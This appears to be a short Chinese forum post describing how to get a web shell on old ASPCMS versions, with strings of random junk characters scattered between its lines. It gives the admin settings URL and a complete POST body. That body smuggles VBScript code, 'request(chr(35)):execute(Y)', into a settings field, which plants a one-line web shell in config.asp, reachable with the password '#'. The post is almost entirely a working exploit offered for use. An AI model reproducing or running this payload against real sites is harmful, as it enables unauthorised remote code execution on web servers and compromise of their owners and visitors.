老的ASPCMS版本的秒杀拿SHELL漏洞4 X1 l% L" d u7 k- w. \
9 G) J% Z% Q* }: L% k 找到后台。。。然后( t. @# X/ e" G2 ?, k. z* `
: {. o1 s- J7 A% \9 ~1 Z( j
/admin/_system/AspCms_SiteSetting.asp?action=saves
! O( |7 T# K. v" U$ ` , J* l# T/ C3 G; {0 A
直接POST, b( s, d. _$ _+ \- ]( i/ _
$ |4 R. h" i& s F' |* }
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
( _, {7 d% y& o m' D' i6 R " Y6 w. W2 y) V4 G
再连接配置文件config.asp 密码为#9 O6 ^; X! U5 Z7 W) ]% I
|